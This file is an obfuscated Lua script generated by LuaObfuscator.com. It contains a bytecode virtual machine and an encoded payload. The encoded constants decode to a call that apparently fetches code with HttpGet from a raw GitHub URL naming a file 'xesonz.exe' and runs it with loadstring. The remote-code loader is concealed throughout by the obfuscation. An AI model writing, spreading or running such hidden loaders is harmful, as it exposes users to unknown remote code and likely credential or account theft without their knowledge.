--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v89=v5(v83,v19);v19=nil;return v89;else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(2 -1))) + 1)) ;return v84-(v84%(620 -(555 + 64))) ;else local v85=931 -(857 + (105 -31)) ;local v86;while true do if (v85==((2205 -(1523 + 114)) -(367 + 181 + 20))) then v86=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21() local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1271 -(222 + 4 + 1044))) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=118 -(8 + 24 + 85) ;end end end local function v22() local v36=957 -(892 + 65) ;local v37;local v38;while true do if (v36==1) then return (v38 * (610 -354)) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;v36=181 -(67 + 113) ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 4 ;return (v42 * (12302277 + 4474939)) + (v41 * (160901 -95365)) + (v40 * 256) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=953 -(802 + 150) ;local v46=(v20(v44,2 -(3 -2) ,36 -16 ) * ((2 + 0)^(1029 -(915 + 82)))) + v43 ;local v47=v20(v44,59 -38 ,31);local v48=((v20(v44,19 + 13 )==((1 + 0) -0)) and  -1) or (1188 -(1069 + 118)) ;if (v47==0) then if (v46==0) then return v48 * (0 -0) ;else local v90=0 -0 ;while true do if (v90==(0 + 0)) then v47=1 -0 ;v45=0;break;end end end elseif (v47==(2031 + 16)) then return ((v46==((1399 -608) -(368 + (861 -(145 + 293))))) and (v48 * (1/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1041 -(10 + 8)) ) * (v45 + (v46/((7 -(435 -(44 + 386)))^(494 -(416 + 26))))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(1486 -(998 + 488))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v66=1, #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 + 0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v68=(function() return 651 -(494 + 157) ;end)();while true do if (v68==0) then if (v52~=(0 -0)) then else local v97=(function() return 0 + 0 ;end)();while true do if ((1 + 0)~=v97) then else v55=(function() return {};end)();v56=(function() return {};end)();v97=(function() return 2 -0 ;end)();end if (0==v97) then v53=(function() return function(v112,v113,v114) local v115=(function() return 0 + 0 ;end)();local v116=(function() return;end)();while true do if (v115~=(0 + 0)) then else v116=(function() return 0 + 0 ;end)();while true do if (v116==(836 -(660 + 176))) then local v176=(function() return 341 -(218 + 123) ;end)();while true do if (v176==(0 + 0)) then v112[v113-#"," ]=(function() return v114();end)();return v112,v113,v114;end end end end break;end end end;end)();v54=(function() return {};end)();v97=(function() return 1;end)();end if (v97==(204 -(14 + 188))) then v52=(function() return 1;end)();break;end end end if (v52~=2) then else v57[ #"nil"]=(function() return v21();end)();for v100= #"[",v23() do local v101=(function() return v21();end)();if (v20(v101, #"}", #">")~=0) then else local v103=(function() return 0;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v103==0) then local v137=(function() return 0;end)();while true do if (v137~=(675 -(534 + 141))) then else v104=(function() return 560 -(306 + 254) ;end)();v105=(function() return nil;end)();v137=(function() return 1 + 0 ;end)();end if (v137~=1) then else v103=(function() return 1 + 0 ;end)();break;end end end if (v103==1) then local v138=(function() return 0 + 0 ;end)();while true do if (v138==(0 -0)) then v106=(function() return nil;end)();v107=(function() return nil;end)();v138=(function() return 1;end)();end if (v138==(1468 -(899 + 568))) then v103=(function() return 2;end)();break;end end end if (v103~=2) then else while true do if (v104~= #"]") then else local v167=(function() return 0;end)();local v168=(function() return;end)();while true do if (v167==(0 + 0)) then v168=(function() return 0;end)();while true do if ((0 -0)==v168) then v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==(603 -(268 + 335))) then local v181=(function() return 0 + 0 ;end)();while true do if (v181~=0) then else v107[ #"xnx"]=(function() return v22();end)();v107[ #".dev"]=(function() return v22();end)();break;end end elseif (v105== #"}") then v107[ #"19("]=(function() return v23();end)();elseif (v105==(2 + 0)) then v107[ #"91("]=(function() return v23() -((574 -(426 + 146))^(412 -(115 + 281))) ;end)();elseif (v105== #"asd") then local v186=(function() return 0 -0 ;end)();local v187=(function() return;end)();while true do if (v186==(0 + 0)) then v187=(function() return 0 -0 ;end)();while true do if ((0 -0)==v187) then v107[ #"19("]=(function() return v23() -((869 -(550 + 317))^16) ;end)();v107[ #".dev"]=(function() return v22();end)();break;end end break;end end end v168=(function() return 1 -0 ;end)();end if (v168~=(1 -0)) then else v104=(function() return 5 -3 ;end)();break;end end break;end end end if (v104~= #"xxx") then else if (v20(v106, #"-19", #"91(")== #"!") then v107[ #"asd1"]=(function() return v59[v107[ #"asd1"]];end)();end v54[v100]=(function() return v107;end)();break;end if (0==v104) then local v170=(function() return 0;end)();local v171=(function() return;end)();while true do if (v170~=(285 -(134 + 151))) then else v171=(function() return 0;end)();while true do if (v171==1) then v104=(function() return  #"\\";end)();break;end if (v171==(1665 -(970 + 695))) then v105=(function() return v20(v101,2, #"xxx");end)();v106=(function() return v20(v101, #"0313",11 -5 );end)();v171=(function() return 1991 -(582 + 1408) ;end)();end end break;end end end if (v104==(1 + 1)) then local v172=(function() return 0 -0 ;end)();while true do if ((1 -0)~=v172) then else v104=(function() return  #"gha";end)();break;end if (v172~=(1271 -(945 + 326))) then else if (v20(v106, #"\\", #"!")~= #",") then else v107[4 -2 ]=(function() return v59[v107[7 -5 ]];end)();end if (v20(v106,2 + 0 ,1826 -(1195 + 629) )~= #"~") then else v107[ #"-19"]=(function() return v59[v107[ #"asd"]];end)();end v172=(function() return 1 -0 ;end)();end end end end break;end end end end for v102= #"~",v23() do v55,v102,v28=(function() return v53(v55,v102,v28);end)();end return v57;end v68=(function() return 1;end)();end if (v68==(242 -(187 + 54))) then if (v52~=(1501 -(1408 + 92))) then else local v99=(function() return 780 -(162 + 618) ;end)();while true do if (v99~=(1088 -(461 + 625))) then else v52=(function() return 1290 -(993 + 295) ;end)();break;end if (v99~=(0 + 0)) then else v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v99=(function() return 1 -0 ;end)();end if (v99~=1) then else v59=(function() return {};end)();for v108= #"!",v58 do local v109=(function() return 0 + 0 ;end)();local v110=(function() return;end)();local v111=(function() return;end)();while true do if (v109==(1172 -(418 + 753))) then if (v110== #"!") then v111=(function() return v21()~=(0 + 0) ;end)();elseif (v110==(2 -0)) then v111=(function() return v24();end)();elseif (v110== #"xnx") then v111=(function() return v25();end)();end v59[v108]=(function() return v111;end)();break;end if (v109==(0 + 0)) then v110=(function() return v21();end)();v111=(function() return nil;end)();v109=(function() return 1;end)();end end end v99=(function() return 1638 -(1373 + 263) ;end)();end end end break;end end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[1 + 1 ];local v65=v60[2 + 1 ];return function(...) local v69=v63;local v70=v64;local v71=v65;local v72=v27;local v73=1 + 0 ;local v74= -(530 -(406 + (266 -143)));local v75={};local v76={...};local v77=v12("#",...) -(1 + 0) ;local v78={};local v79={};for v87=0,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + ((3685 -2362) -(1249 + (163 -90))) ];else v79[v87]=v76[v87 + 1 + 0 + (0 -0) ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v88=1145 -(466 + 679) ;while true do if ((2 -1)==v88) then if ((3946>=3743) and (v82<=(8 -(758 -(239 + 514))))) then if (v82<=(1901 -(106 + 1794))) then if (v82==0) then v79[v81[1 + 1 ]]=v81[1 + 2 ];else v79[v81[5 -3 ]]=v62[v81[7 -4 ]];end elseif (v82>2) then local v121=v81[1 + 1 ];local v122=v79[v81[3]];v79[v121 + (115 -(4 + 110)) ]=v122;v79[v121]=v122[v81[(1917 -(797 + 532)) -(57 + 527) ]];else local v126=v81[2];local v127,v128=v72(v79[v126](v13(v79,v126 + 1 ,v81[3])));v74=(v128 + v126) -(1428 -(41 + 1386)) ;local v129=103 -(17 + 86) ;for v139=v126,v74 do v129=v129 + 1 + 0 ;v79[v139]=v127[v129];end end elseif ((v82<=(11 -6)) or (1335>=3306)) then if (v82>(11 -7)) then do return;end else v79[v81[168 -(122 + 44) ]]={};end elseif (v82<=(10 -4)) then local v131=0;local v132;local v133;local v134;local v135;local v136;while true do if (v131==(16 -11)) then v73=v73 + 1 + 0 ;v81=v69[v73];v136=v81[2];v133,v134=v72(v79[v136](v13(v79,v136 + 1 + 0 + 0 ,v81[5 -2 ])));v131=6;end if ((4844>2253) and (v131==((25 + 48) -(30 + 35)))) then v81=v69[v73];v79[v81[2]]();v73=v73 + 1 + 0 ;v81=v69[v73];v131=1266 -((2451 -1408) + 214) ;end if (v131==(11 -8)) then v81=v69[v73];v136=v81[1214 -(323 + 889) ];v135=v79[v81[7 -4 ]];v79[v136 + (581 -(361 + 219)) ]=v135;v131=4;end if (v131==(1209 -(373 + 829))) then v81=v69[v73];v136=v81[2];v79[v136]=v79[v136](v13(v79,v136 + (321 -(53 + 267)) ,v74));v73=v73 + 1 + 0 ;v131=421 -(15 + (1129 -(476 + 255))) ;end if ((452==452) and (v131==(988 -(18 + 964)))) then v74=(v134 + v136) -(3 -(1132 -(369 + 761))) ;v132=0 + 0 + 0 ;for v173=v136,v74 do v132=v132 + 1 + 0 ;v79[v173]=v133[v132];end v73=v73 + ((1545 -694) -(20 + (1572 -742))) ;v131=6 + 1 ;end if ((v131==9) or (4557<2087)) then do return;end break;end if (v131==(130 -(116 + 10))) then v79[v136]=v135[v81[1 + 3 ]];v73=v73 + (739 -(542 + 196)) ;v81=v69[v73];v79[v81[3 -1 ]]=v81[3];v131=2 + 3 ;end if ((3874==3874) and (v131==(2 + 0))) then v73=v73 + 1 + 0 ;v81=v69[v73];v79[v81[2]]=v62[v81[7 -4 ]];v73=v73 + (2 -1) ;v131=1554 -((1364 -(64 + 174)) + 425) ;end if (v131==(405 -(118 + 287))) then v132=nil;v133,v134=nil;v135=nil;v136=nil;v131=3 -(1 + 1) ;end if (v131==(1122 -((174 -56) + 1003))) then v79[v81[5 -3 ]]={};v73=v73 + 1 ;v81=v69[v73];v79[v81[379 -(142 + (571 -(144 + 192))) ]]=v62[v81[13 -10 ]];v131=(217 -(42 + 174)) + 1 ;end end elseif ((v82>(984 -(553 + 424))) or (1938>4935)) then local v143=v81[(3 + 0) -(1 + 0) ];v79[v143]=v79[v143](v13(v79,v143 + 1 ,v74));else v79[v81[2 + 0 ]]();end v73=v73 + 1 + 0 ;break;end if (v88==0) then v81=v69[v73];v82=v81[1 + 0 + 0 ];v88=1 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034C3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F696C6F766578656E6F6E2F6D61696E2F726566732F68656164732F6D61696E2F7865736F6E7A2E65786500094Q00067Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
